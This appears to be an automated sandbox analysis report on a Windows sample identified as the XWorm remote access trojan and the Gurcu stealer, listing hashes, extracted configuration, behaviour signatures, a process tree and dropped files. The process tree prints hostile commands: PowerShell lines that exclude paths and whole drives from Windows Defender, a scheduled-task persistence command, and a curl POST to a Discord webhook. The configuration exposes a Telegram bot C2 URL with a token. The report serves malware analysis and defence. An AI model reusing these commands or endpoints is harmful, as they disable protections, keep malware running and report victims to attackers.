Analysis

  • max time kernel
    629s
  • max time network
    428s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240704-en
  • resource tags

    arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08-07-2024 01:53

General

  • Target

    ey341.exe

  • Size

    64KB

  • MD5

    a43a55c5578f61d05ce146ead83e745a

  • SHA1

    83093f791120d3e74b0d0847aebc52d3c9f04078

  • SHA256

    de4d28dd8c9208fe86dec1e014913f3cfefdcadf73a7adb6eb062677f5f5772f

  • SHA512

    a49839e60d77003090e0c9f602a64e597648e7151d99c5096479984cee32d376c8bd425114704b9366d213d0e9494900a726dead28e0548c5b7788ad5e5cbf1d

  • SSDEEP

    1536:BmxzG1o8ep4jtWQ/GZg8S7gbgUBGK7/J6DOSsvk:Bmx61oFp4jtWQuuLgbgUgK7AOSss

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    winlogon.exe

  • pastebin_url

    https://pastebin.com/raw/kTrgfRNT

  • telegram

    https://api.telegram.org/bot6820329388:AAG0ljIyZ1Cj86n9cgzLGNBMldBe9TtqhAM/sendMessage?chat_id=1330099235

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6820329388:AAG0ljIyZ1Cj86n9cgzLGNBMldBe9TtqhAM/sendMessage?chat_id=1330099235

Signatures

  • Detect Xworm Payload 2 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies registry class 7 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs
  • System policy modification 1 TTPs 5 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ey341.exe
    "C:\Users\Admin\AppData\Local\Temp\ey341.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ey341.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2456
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ey341.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1904
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2848
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1580
    • C:\Users\Admin\AppData\Local\Temp\rfkulx.exe
      "C:\Users\Admin\AppData\Local\Temp\rfkulx.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4744
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2DD1.tmp\2DD2.tmp\2DD3.bat C:\Users\Admin\AppData\Local\Temp\rfkulx.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1216
        • C:\Windows\system32\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4904
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:2808
          • C:\Windows\system32\net.exe
            net session
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4104
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 session
              5⤵
                PID:1288
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2832
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'F:\'"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2268
            • C:\Windows\system32\timeout.exe
              Timeout /t 2 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:3392
            • C:\Windows\system32\curl.exe
              curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"ok yes = Admin\"}" https://discord.com/api/webhooks/1256685656042770514/cT3cfWiuStxsqAn9Hxjtb_A3ddEwoqWoI__e_KjA2vlu7h3WeLiaJNZp_qhl3f3E_uQo
              4⤵
                PID:4852
          • C:\Users\Admin\AppData\Local\Temp\vdxfkb.exe
            "C:\Users\Admin\AppData\Local\Temp\vdxfkb.exe"
            2⤵
            • Executes dropped EXE
            PID:4376
          • C:\Users\Admin\AppData\Local\Temp\vqqrwc.exe
            "C:\Users\Admin\AppData\Local\Temp\vqqrwc.exe"
            2⤵
            • Executes dropped EXE
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:1520
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\54455354\ERR0R422.exe
              "C:\Users\Admin\AppData\Local\Microsoft\Windows\54455354\ERR0R422.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2204
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2EE6.tmp\2EE7.tmp\2EE8.bat C:\Users\Admin\AppData\Local\Microsoft\Windows\54455354\ERR0R422.exe"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3112
                • C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
                  java -Xmx1024M -Xms1024M -cp ERROR422.jar "-Dorg.lwjgl.librarypath=C:\Users\Admin\AppData\Local\Microsoft\Windows\54455354/natives" "-Dnet.java.games.input.librarypath=C:\Users\Admin\AppData\Local\Microsoft\Windows\54455354/natives" Start
                  5⤵
                  • Loads dropped DLL
                  • Suspicious use of SetWindowsHookEx
                  PID:3216
          • C:\Users\Admin\AppData\Local\Temp\pztiot.exe
            "C:\Users\Admin\AppData\Local\Temp\pztiot.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:3960
          • C:\Users\Admin\AppData\Local\Temp\iwmuqe.EXE
            "C:\Users\Admin\AppData\Local\Temp\iwmuqe.EXE"
            2⤵
            • Executes dropped EXE
            PID:424
          • C:\Users\Admin\AppData\Local\Temp\vimqcd.exe
            "C:\Users\Admin\AppData\Local\Temp\vimqcd.exe"
            2⤵
            • Modifies WinLogon for persistence
            • UAC bypass
            • Disables RegEdit via registry modification
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Writes to the Master Boot Record (MBR)
            • Modifies Control Panel
            • Suspicious behavior: EnumeratesProcesses
            • System policy modification
            PID:4088
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /delete /f /tn "winlogon"
            2⤵
              PID:4256
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFFE8.tmp.bat""
              2⤵
                PID:3552
            • C:\ProgramData\winlogon.exe
              C:\ProgramData\winlogon.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2776
            • C:\Windows\system32\AUDIODG.EXE
              C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004E0
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4048
            • C:\ProgramData\winlogon.exe
              C:\ProgramData\winlogon.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1572
            • C:\ProgramData\winlogon.exe
              C:\ProgramData\winlogon.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4328
            • C:\ProgramData\winlogon.exe
              C:\ProgramData\winlogon.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2236
            • C:\Windows\explorer.exe
              explorer.exe
              1⤵
                PID:3044
              • C:\ProgramData\winlogon.exe
                C:\ProgramData\winlogon.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4692
              • C:\Windows\system32\sihost.exe
                sihost.exe
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:4476
                • C:\Windows\explorer.exe
                  explorer.exe /LOADSAVEDWINDOWS
                  2⤵
                  • Boot or Logon Autostart Execution: Active Setup
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:2436
              • C:\Windows\explorer.exe
                explorer.exe
                1⤵
                  PID:4216

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\winlogon.exe

                  Filesize

                  64KB

                  MD5

                  a43a55c5578f61d05ce146ead83e745a

                  SHA1

                  83093f791120d3e74b0d0847aebc52d3c9f04078

                  SHA256

                  de4d28dd8c9208fe86dec1e014913f3cfefdcadf73a7adb6eb062677f5f5772f

                  SHA512

                  a49839e60d77003090e0c9f602a64e597648e7151d99c5096479984cee32d376c8bd425114704b9366d213d0e9494900a726dead28e0548c5b7788ad5e5cbf1d

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  627073ee3ca9676911bee35548eff2b8

                  SHA1

                  4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                  SHA256

                  85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                  SHA512

                  3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\winlogon.exe.log

                  Filesize

                  654B

                  MD5

                  2cbbb74b7da1f720b48ed31085cbd5b8

                  SHA1

                  79caa9a3ea8abe1b9c4326c3633da64a5f724964

                  SHA256

                  e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

                  SHA512

                  ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\54455354\ERR0R422.exe

                  Filesize

                  44KB

                  MD5

                  51ec46a22f2f8bea7c396f8f5fa4dca3

                  SHA1

                  cc260eade22bc79b82f04cc2fb70f1a529a537e0

                  SHA256

                  7a083b17aa3ddd054d5221bda285d75ed4a060fb3933f8461e178ccc647da7b5

                  SHA512

                  69907e7074c8a4bdf1b657a9daad3378ea8df1a92d4b8f5f1ed8a4b3a87b8f0351298d973c7b1827f7d2b04fb67ce672d065bfdf9c8feee65f520a27989513ce

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\54455354\ERROR422.jar

                  Filesize

                  10.0MB

                  MD5

                  8dc2b240b963e3fece100bd6b767033b

                  SHA1

                  a55caa359cb65ed9f0d8b186e2183266ff95afb6

                  SHA256

                  338d6fe860e9074fecdb7fd7370139aa4acabdd019a99d22cdeabee3bca808aa

                  SHA512

                  60f531315df75109def781a9fdd2e29e08b0b62d62410f6dd03243026a07627014f738ca644134b64613447639f67dd902376796fd35c4514f46a2b8d1157b07

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\54455354\natives\lwjgl.dll

                  Filesize

                  188KB

                  MD5

                  517d0f050ebbf8a7d2c6a4def78218dd

                  SHA1

                  dbce970a2d4cf6485519ef1b730bd3246fa390d9

                  SHA256

                  a81e22e91c831bf3d60569b6a1d9b0e9bab283e20be819da8117dcbb731e07a2

                  SHA512

                  fc0bcb4cad490cf16239aaa381ba65817682bef36418347630df4d2df39c95b0280ecc2346baa561c5c4dcf6a952b315767276efc9c2969b6ea4e47ed0be945f

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\54455354\natives\lwjgl64.dll

                  Filesize

                  267KB

                  MD5

                  10fe2f603bf0fc79da41711d28d71a3a

                  SHA1

                  ba7833cdbd9a942fc4213226d1a31158b70a6d77

                  SHA256

                  f81fafba810b85f697191e1d7eaf515498f5c5919db065418ef490f25bfdbea1

                  SHA512

                  9648b1309db35e0c90e8d0566198bd732ee4b26d0a1c9258e1eeca16fc70e8c32b4cdcda4a9788f75f390d22e11b130e30ca8914750797cf42351ee45badb322

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  6903d57eed54e89b68ebb957928d1b99

                  SHA1

                  fade011fbf2e4bc044d41e380cf70bd6a9f73212

                  SHA256

                  36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

                  SHA512

                  c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  4914eb0b2ff51bfa48484b5cc8454218

                  SHA1

                  6a7c3e36ce53b42497884d4c4a3bda438dd4374b

                  SHA256

                  7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e

                  SHA512

                  83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  051a74485331f9d9f5014e58ec71566c

                  SHA1

                  4ed0256a84f2e95609a0b4d5c249bca624db8fe4

                  SHA256

                  3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888

                  SHA512

                  1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  cef328ddb1ee8916e7a658919323edd8

                  SHA1

                  a676234d426917535e174f85eabe4ef8b88256a5

                  SHA256

                  a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90

                  SHA512

                  747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  d5bfa8bfa4724309248f8219e3501e84

                  SHA1

                  dcdf5cd53a02d97515985215ad46a36feb37167b

                  SHA256

                  6f6147c1ea4009c4c19a07b05e43792bdacc48226db2fa3de5189725cdd4964a

                  SHA512

                  5c3b486b4c4d715009ff362c33c7b268ee59b9f674217ffef82aa4c704afa6bea14e048f47b095aa62c11d016533d72e89076261068cb793c9a9737b48bef304

                • C:\Users\Admin\AppData\Local\Temp\2DD1.tmp\2DD2.tmp\2DD3.bat

                  Filesize

                  1KB

                  MD5

                  1356fcea9147c3bde1541e047d4b102b

                  SHA1

                  941eb579edf7f4cf5ec602a1e7b7ced27d525d13

                  SHA256

                  477741b3e5a8968f85117a68638377a93cec72b4280e5a62c763ccee4da68871

                  SHA512

                  f463e47f6fd24d55b3ba02ea304733b6dee46f6580a2335a70996276cb1e14a6d097dde943b8ca969d76f4818a3c125f2183cc2ab62f2d172e416db415a00684

                • C:\Users\Admin\AppData\Local\Temp\2EE6.tmp\2EE7.tmp\2EE8.bat

                  Filesize

                  147B

                  MD5

                  c18d654820bb66f2a1c8d14177590758

                  SHA1

                  6d5d5b551f1d530e5538e534709605bb5f7a7ceb

                  SHA256

                  0a3bcb6f9e67056e8a69553c85a37eda4b27007c07b74891aa6de647ea4e8754

                  SHA512

                  2c172bbebac2c3bdafa81c440a0a4d66fad64a96acbc9084a7a977abb8d69c779206ff46cedea2f36686f43e5d168aca39a1bf6630b926337d05d8d4d5b1666a

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttxbqiuv.var.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\iwmuqe.EXE

                  Filesize

                  287KB

                  MD5

                  2d07f1732527ea206a20d48372994458

                  SHA1

                  9886fc5cc285f2250ae500daa98ad72d4afd8e72

                  SHA256

                  a4ea663aa319447d49c40a6f825fe9d557977a633c263449f60d5d6768e39abd

                  SHA512

                  c30869e0b3ad77979feaa00f97f3a7440e8b66b238c1e1403e61745a06f215c18f6e6895ebbccdf862fed8f5f4e746a17e1e1d97edbac09fbfd59efe232d3e71

                • C:\Users\Admin\AppData\Local\Temp\pztiot.exe

                  Filesize

                  24KB

                  MD5

                  1a4bab8710264cbee18fccd998dd4dd3

                  SHA1

                  41e6d14da0a559a3764bd57cd8017e4c5b41a97b

                  SHA256

                  522690525ad617c5995ee43c1efcf7c4e43750e9118825f054cc2136e19d93a9

                  SHA512

                  d279e5fe40dcacaba2cd162cb3f18219868768612b50da460d4acc02e358e7b83033a685dc68c2741a2e8048b6df525bc99a825e87b8a03679d8ee23847ebdfa

                • C:\Users\Admin\AppData\Local\Temp\rfkulx.exe

                  Filesize

                  121KB

                  MD5

                  5d64b19f27eeabeab0eb77da92f3763b

                  SHA1

                  f55dee1a71ec48f87e734e43a8e012421a6076bc

                  SHA256

                  622fcd2f5c02863ef372cce755cf7692ece0191be5e586d5441abd0e94f2be87

                  SHA512

                  04e50f9ec4cf7a87c66982bf52e0c7f41619b858c6d30978cae27a096e3e6f3840da96f30bae82a02b4797c7576f0bb7dc99b31728fba2c114401b2189da280e

                • C:\Users\Admin\AppData\Local\Temp\vdxfkb.exe

                  Filesize

                  10.0MB

                  MD5

                  be9b8e7c29977c01f3122f1e5082f45d

                  SHA1

                  c53a253ac33ab33e94f3ad5e5200645b6391b779

                  SHA256

                  cb6384b855d46fe5678bb3d5d1fc77c800884f8345cb490e1aa71646e872d3ae

                  SHA512

                  91514128a7a488581372881a556b081ad920086fd43da84188033f0bd48f294199192b753ec691c2cb79072420b346f767d9cfb4ef2d119ca1e345d65df8dc34

                • C:\Users\Admin\AppData\Local\Temp\vqqrwc.exe

                  Filesize

                  10.4MB

                  MD5

                  c15722d1f29b28fefac3a34c1d1a296a

                  SHA1

                  cf775816f832f08a024de89c96eb9311ef2a66c5

                  SHA256

                  c1d06468a2f089b4f6efbd51f4a140be40283e2efc76d25712e63471bca9f235

                  SHA512

                  11618e411a8c55eb0a6f7cea0a0c0a70c5df521652cadc09339d43dffcdb7da15155adb8d42bf8a214f542382f01c29086fb14258ea5eab91bb2335474a070ad

                • memory/1520-166-0x0000000000400000-0x0000000000E29000-memory.dmp

                  Filesize

                  10.2MB

                • memory/1520-193-0x0000000000400000-0x0000000000E29000-memory.dmp

                  Filesize

                  10.2MB

                • memory/2204-204-0x0000000000400000-0x000000000041D000-memory.dmp

                  Filesize

                  116KB

                • memory/2204-187-0x0000000000400000-0x000000000041D000-memory.dmp

                  Filesize

                  116KB

                • memory/2456-15-0x00007FFD30810000-0x00007FFD312D2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2456-11-0x000001C661430000-0x000001C661452000-memory.dmp

                  Filesize

                  136KB

                • memory/2456-13-0x00007FFD30810000-0x00007FFD312D2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2456-14-0x00007FFD30810000-0x00007FFD312D2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2456-12-0x00007FFD30810000-0x00007FFD312D2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2456-19-0x00007FFD30810000-0x00007FFD312D2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2456-16-0x00007FFD30810000-0x00007FFD312D2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2896-74-0x000000001C8E0000-0x000000001C8EC000-memory.dmp

                  Filesize

                  48KB

                • memory/2896-86-0x00007FFD30810000-0x00007FFD312D2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2896-495-0x00007FFD30810000-0x00007FFD312D2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2896-432-0x000000001B350000-0x000000001B35C000-memory.dmp

                  Filesize

                  48KB

                • memory/2896-0-0x00007FFD30813000-0x00007FFD30815000-memory.dmp

                  Filesize

                  8KB

                • memory/2896-1-0x0000000000CC0000-0x0000000000CD6000-memory.dmp

                  Filesize

                  88KB

                • memory/2896-2-0x00007FFD30810000-0x00007FFD312D2000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3216-226-0x00000265ED370000-0x00000265ED371000-memory.dmp

                  Filesize

                  4KB

                • memory/3216-229-0x00000265ED370000-0x00000265ED371000-memory.dmp

                  Filesize

                  4KB

                • memory/3216-207-0x00000265ED370000-0x00000265ED371000-memory.dmp

                  Filesize

                  4KB

                • memory/3216-245-0x00000265ED370000-0x00000265ED371000-memory.dmp

                  Filesize

                  4KB

                • memory/3216-247-0x00000265ED370000-0x00000265ED371000-memory.dmp

                  Filesize

                  4KB

                • memory/4376-99-0x000002C7C85A0000-0x000002C7C8F9C000-memory.dmp

                  Filesize

                  10.0MB

                • memory/4376-102-0x000002C7E3740000-0x000002C7E375E000-memory.dmp

                  Filesize

                  120KB

                • memory/4376-101-0x000002C7E35D0000-0x000002C7E35DD000-memory.dmp

                  Filesize

                  52KB

                • memory/4376-100-0x000002C7E4160000-0x000002C7E41A6000-memory.dmp

                  Filesize

                  280KB

                • memory/4376-103-0x000002C7E35E0000-0x000002C7E35EB000-memory.dmp

                  Filesize

                  44KB